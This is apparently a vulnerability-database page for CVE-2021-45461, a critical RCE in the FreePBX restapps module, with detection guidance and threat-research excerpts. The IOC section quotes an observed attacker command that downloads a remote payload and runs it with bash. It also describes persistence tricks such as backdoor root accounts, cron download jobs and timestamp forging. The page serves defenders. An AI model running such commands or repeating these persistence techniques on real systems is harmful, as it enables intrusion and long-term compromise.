CVE-2021-45461
published 2021-12-22CVE-2021-45461: FreePBX, when restapps (aka Rest Phone Apps) 15.0.19.87, 15.0.19.88, 16.0.18.40, or 16.0.18.41 is installed, allows remote attackers to execute arbitrary code…
PriorityP186critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWVulnCheck KEV
Exploited in the wild
EPSS
21.66%
97.3th percentile
FreePBX, when restapps (aka Rest Phone Apps) 15.0.19.87, 15.0.19.88, 16.0.18.40, or 16.0.18.41 is installed, allows remote attackers to execute arbitrary code, as exploited in the wild in December 2021. The fixed versions are 15.0.20 and 16.0.19.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sangoma | restapps | — | — |
| sangoma | restapps | — | — |
| sangoma | restapps | — | — |
| sangoma | restapps | — | — |
Detection & IOCsextracted from sources · hover to see the quote
command(setsid wget "hxxp://45[.]234[.]176[.]202/new/k.php" -O /var/spool/asterisk/tmp/serv 2>/dev/null >/dev/null; bash /var/spool/asterisk/tmp/serv 2>/dev/null > /dev/null & ) 2>&1↗
- →Look for the web shell parameter 'md5' in HTTP requests to ajax.php on FreePBX/Elastix servers — the web shell authenticates by comparing a user-supplied MD5 hash against a hardcoded value mapped to the victim's public IP. ↗
- →Hunt for creation of local user accounts named 'sugarmaint', 'supports', or 'newfpbx' with UID 0 on FreePBX/Asterisk hosts. ↗
- →Monitor for crontab entries that fetch and execute k.php from a remote IP every minute — a key persistence indicator for this campaign. ↗
- →Detect file writes to /var/lib/asterisk/bin/ for non-standard binaries named 'zen2', 'devnull2', or 'devnull' — these are dropper persistence artifacts. ↗
- →Alert on chmod 000 applied to ajax.php or model.php in FreePBX web directories — the dropper does this to clear the way before deploying its own web shell. ↗
- →Detect timestamp-forging activity: 'touch <webshell_file> -r <legitimate_file>' in FreePBX web directories, used to blend malicious files with legitimate ones. ↗
- →Monitor for the presence of license.php under /var/www/html/admin/modules/freepbx_ha/ — this is a malicious persistence dropper, not a legitimate FreePBX file. ↗
- →The malware implants a random junk string in each download to evade hash-based IOC detection — rely on behavioral and path-based detections rather than file hashes alone. ↗
- ·The web shell's MD5 authentication hash is uniquely mapped per victim — the hardcoded hash value will differ across compromised hosts, making it unsuitable as a universal static IOC. ↗
- ·The malware injects random junk strings into each downloaded payload, meaning file hashes will be unique per download and cannot be relied upon for signature-based detection. ↗
- ·The dropper forges file timestamps on deployed web shells to match legitimate FreePBX files, so timestamp-based forensic triage will not reliably identify malicious files. ↗
- ·The web shell is deployed to at least 12 distinct paths under /var/www/html/ — remediation must check all listed locations, not just the primary ajax.php path. ↗
- ·The dropper echoes the 'rm' command three times without executing it to create the false appearance of self-removal — do not assume the malware is gone based on log entries showing rm commands. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-pph6-2c9x-fm9c: FreePBX, when restapps (aka Rest Phone Apps) 15
ghsa_unreviewed·2021-12-23
CVE-2021-45461 [CRITICAL] GHSA-pph6-2c9x-fm9c: FreePBX, when restapps (aka Rest Phone Apps) 15
FreePBX, when restapps (aka Rest Phone Apps) 15.0.19.87, 15.0.19.88, 16.0.18.40, or 16.0.18.41 is installed, allows remote attackers to execute arbitrary code, as exploited in the wild in December 2021. The fixed versions are 15.0.20 and 16.0.19.
VulnCheck
FreePBX restapps (aka Rest Phone Apps) 15.0.19.87, 15.0.19.88, 16.0.18.40, or 16.0.18.41 Remote Code Execution
vulncheck·2021·CVSS 9.8
CVE-2021-45461 [CRITICAL] FreePBX restapps (aka Rest Phone Apps) 15.0.19.87, 15.0.19.88, 16.0.18.40, or 16.0.18.41 Remote Code Execution
FreePBX restapps (aka Rest Phone Apps) 15.0.19.87, 15.0.19.88, 16.0.18.40, or 16.0.18.41 Remote Code Execution
FreePBX, when restapps (aka Rest Phone Apps) 15.0.19.87, 15.0.19.88, 16.0.18.40, or 16.0.18.41 is installed, allows remote attackers to execute arbitrary code, as exploited in the wild in December 2021. The fixed versions are 15.0.20 and 16.0.19.
Affected: Sangoma restapps
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://community.freepbx.org/t/security-issue-potential-rest-phone-apps-rce/80109; https://www.cve.org/CVERecord?id=CVE-2021-45461; https://www.fortinet.com/blog/threat-research/unveiling-the-weaponized-web-shell-encystphp
No detection rules found.
No public exploits indexed.
Fortinet
Unveiling the Weaponized Web Shell EncystPHP | FortiGuard Labs
blogs_fortinet·2026-01-28·CVSS 9.8
[CRITICAL] Unveiling the Weaponized Web Shell EncystPHP | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
Unveiling the Weaponized Web Shell EncystPHP
A persistent FreePBX web shell enabling long-term administrative compromise
FORTIGUARD SECURITY PORTFOLIO 2025 THREAT LANDSCAPE REPORT
Incidents
Malware Analysis
Conclusion
Fortinet Protections
IOCs
URLs
Hosts
Files
MITRE ATT&CK Mapping for EncystPHP Campaign
By Vincent Li | January 28, 2026
Affected Platforms: FreePBX Endpoint Manager v17.0.2.36 – v17.0.3
Impacted Users: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity Level: High
FortiGuard Labs has discovered a web shell that we named “EncystPHP.” It features several advanced capabilities, including remote command execution, persistence mechanisms, and web shell deployment. Incidents were launched in early December
Fortinet
Unveiling the Weaponized Web Shell EncystPHP | FortiGuard Labs
blogs_fortinet·2026-01-28·CVSS 9.8
[CRITICAL] Unveiling the Weaponized Web Shell EncystPHP | FortiGuard Labs
FortiGuard Labs Threat Research
# Unveiling the Weaponized Web Shell EncystPHP
A persistent FreePBX web shell enabling long-term administrative compromise
FortiGuard Security Portfolio
2025 Threat Landscape Report
By
Vincent Li
| January 28, 2026
- Article Contents
By
Vincent Li
| January 28, 2026
Affected Platforms: FreePBX Endpoint Manager v17.0.2.36 – v17.0.3
Impacted Users: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity Level: High
FortiGuard Labs has discovered a web shell that we named “EncystPHP.” It features several advanced capabilities, including remote command execution, persistence mechanisms, and web shell deployment. Incidents were launched in early December last year and propagated via exploitation of the FreePBX v
Checkpoint
18th July – Threat Intelligence Report
blogs_checkpoint·2022-07-18
CVE-2022-2033 18th July – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 18th July – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 18th July, please download our Threat Intelligence Bulletin .
Top Attacks and Breaches
A callback phishing campaign has been observed targeting corporate networks while impersonating known cybersecurity companies – the emails mention an alleged threat in the target’s network, asking them to call the company and let them in the network to investigate. Some suggest the operation is done by the Quantum ransomware ga
Unit42
Digium Phones Under Attack: Insight Into the Web Shell Implant
blogs_unit42·2022-07-15·CVSS 9.8
[CRITICAL] Digium Phones Under Attack: Insight Into the Web Shell Implant
## Executive Summary
Installing a web shell on a web server is a common approach malware authors take to launch exploits or run commands remotely. In November 2020, the INJ3CTOR3 operation targeted the Sangoma PBX, a popular VoIP PBX system, by installing a web shell on its web server. Recently, Unit 42 observed another operation that targets the Elastix system used in Digium phones. The attacker implants a web shell to exfiltrate data by downloading and executing additional payloads inside the target's Digium phone software (a FreePBX module written in PHP). In terms of the timeline, the web shell appears to be correlated to the remote code execution (RCE) vulnerability CVE-2021-45461 in the Rest Phone Apps (restapps) module.
As of this writing, we have witnessed more than 500,000 uniqu
Unit42
Digium Phones Under Attack: Insight Into the Web Shell Implant
blogs_unit42·2022-07-15·CVSS 9.8
CVE-2021-45461 [CRITICAL] Digium Phones Under Attack: Insight Into the Web Shell Implant
Threat Research Center
Threat Research
Malware
## Digium Phones Under Attack: Insight Into the Web Shell Implant
Lee Wei
Yang Ji
Muhammad Umer Khan
Wenjun Hu
Published: July 15, 2022
Malware
Threat Research
CVE-2021-45461
Digium Asterisk
Mobile
Mobile malware
## Executive Summary
Installing a web shell on a web server is a common approach malware authors take to launch exploits or run commands remotely. In November 2020, the INJ3CTOR3 operation targeted the Sangoma PBX, a popular VoIP PBX system, by installing a web shell on its web server. Recently, Unit 42 observed another operation that targets the Elastix system used in Digium phones . The attacker implants a web shell to exfiltrate data by downloading and executing additional payloads inside the target's Digium pho
Threat Intel
INJ3CTOR3
threat_intel·CVSS 9.8
CVE-2019-19006 [CRITICAL] INJ3CTOR3
# Threat Actor: INJ3CTOR3
## Description
INJ3CTOR3 is a threat actor first identified in 2020, known for targeting vulnerabilities in VoIP systems, specifically CVE-2019-19006 and CVE-2021-45461. Their operations involve exploiting FreePBX vulnerabilities to deploy PHP web shells for data exfiltration and persistence. The group utilizes tools for SIP server exploitation, including brute-force scripts and authentication bypass techniques. Observations indicate a resurgence of their attack patterns, reflecting historical behaviors while adapting to current vulnerabilities.
https://community.freepbx.org/t/0-day-freepbx-exploit/80092https://community.freepbx.org/t/security-issue-potential-rest-phone-apps-rce/80109https://wiki.freepbx.org/display/FOP/2021-12-21+SECURITY%3A+Potential+Rest+Phone+Apps+RCEhttps://community.freepbx.org/t/0-day-freepbx-exploit/80092https://community.freepbx.org/t/security-issue-potential-rest-phone-apps-rce/80109https://wiki.freepbx.org/display/FOP/2021-12-21+SECURITY%3A+Potential+Rest+Phone+Apps+RCE
2021-12-22
Published
Exploited in the wild